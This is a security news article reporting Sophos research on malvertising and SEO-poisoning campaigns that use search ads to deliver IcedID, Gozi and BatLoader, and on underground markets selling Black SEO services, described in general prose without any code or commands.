Cybercrime , Fraud Management & Cybercrime , Social Engineering
Cybercriminals are leveraging Google’s paid advertisement service to push malicious sites on top search results in order to trick victims into downloading malware such as IcedID and Gozi Trojan.
See Also: Live Webinar | Unmasking Pegasus: Understand the Threat & Strengthen Your Digital Defense
Researchers at Sophos identified multiple campaigns using malvertising to lure unsuspecting users into downloading malware.
“When a user searches for a related term and clicks through to the malicious site, the attackers check the Referer header to confirm the user came via the search engine, and then entice them into downloading malware disguised as a legitimate software application,” the researchers said.
Christopher Budd, director of threat research at Sophos, told Information Security Media Group that there has been a resurgence in the use of malvertising in a wide variety of campaigns and advertisements for this type of service on underground forums.
“We believe it could be attackers working around changes Microsoft made last year to protect against malicious macros. The growth of cybercrime as a service could also explain the growing availability and use of malvertising by threat actors,” Budd said.
Malvertising has many advantages, said Budd. Cybercriminals can use it to specifically target users, particularly geographically. And these types of malware campaigns can be hard for defenders to track and take down, he said.
Recently, researchers at Trend Micro uncovered how the BlackCat ransomware-as-a-service group was developing a threat activity cluster using chosen keywords on the web pages of legitimate organizations to deploy malicious malware (see: BlackCat Uses Malvertising to Push Backdoor).
Sophos researchers also found campaigns targeting users searching for AI-related tools such as Midjourney and ChatGPT. “It’s likely that criminals will continue to evolve their malvertising campaigns, and the security community should be on alert,” Budd said.
The latest malvertising campaigns involving IcedID included lures related to communications platforms such as Microsoft Teams, Slack, Brave Browser and LibreOffice; IT administration tools such as WebEx, GoTo, AnyDesk and TeamViewer; and finance-related software.
In another campaign, researchers observed that a VHD container had been downloaded from a malicious site. When mounted, it revealed Installer.bat, a batch file containing simple commands intended to raise execution privileges, add scanning exclusions for Windows Defender and download and execute a remote batch script and an executable.
Researchers found that the URLs in the batch script contained hash values identical to previous BatLoader campaigns. The initial access malware loader, BatLoader, allows threat actors to download more sophisticated malware such as the prominent commodity info stealer Raccoon Stealer and the backdoor Gozi/Ursnif.
Sophos researchers analyzed prominent criminal marketplaces and observed a significant number of advertisements for and discussion about SEO poisoning, malvertising and related services, going back to 2016.
Most recently, bad actors have listed compromised Google Ads accounts for sale. The researchers also observed the sale of so-called Black SEO services as part of a bundle, along with other malware-related listings.
“Marketplace users have a keen interest in SEO poisoning and malvertising,” the researchers said. “This may be because malvertising offers several advantages to threat actors: It allows them to target specific regions, and because victims are already looking to download something, the probability of infection may increase.”
Malvertising also bypasses email filters and can convince users to click a link or download and open an attachment.
Assistant Editor, Global News Desk, ISMG
Nair previously worked at TechCircle, IDG, Times Group and other publications, where he reported on developments in enterprise technology, digital transformation and other issues.

Covering topics in risk management, compliance, fraud, and information security.
By submitting this form you agree to our Privacy & GDPR Statement
whitepaper
whitepaper
Security Awareness Programs & Computer-Based Training
Governance & Risk Management
HIPAA/HITECH
Governance & Risk Management
Finance & Banking
Continue »
90 minutes · Premium OnDemand 
Overview
From heightened risks to increased regulations, senior leaders at all levels are pressured to improve their organizations’ risk management capabilities. But no one is showing them how – until now.
Learn the fundamentals of developing a risk management program from the man who wrote the book on the topic: Ron Ross, computer scientist for the National Institute of Standards and Technology. In an exclusive presentation, Ross, lead author of NIST Special Publication 800-37 – the bible of risk assessment and management – will share his unique insights on how to:
Sr. Computer Scientist & Information Security Researcher, National Institute of Standards and Technology (NIST)
Was added to your briefcase
Black SEO Offerings Gaining Momentum in Underground Forums
Black SEO Offerings Gaining Momentum in Underground Forums
Just to prove you are a human, please solve the equation:

Sign in now
Need help registering?
Contact support
Complete your profile and stay up to date
Contact Support
Create an ISMG account now
Create an ISMG account now
Need help registering?
Contact support
Sign in now
Need help registering?
Contact support
Sign in now
Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website. By browsing bankinfosecurity.com, you agree to our use of cookies.

source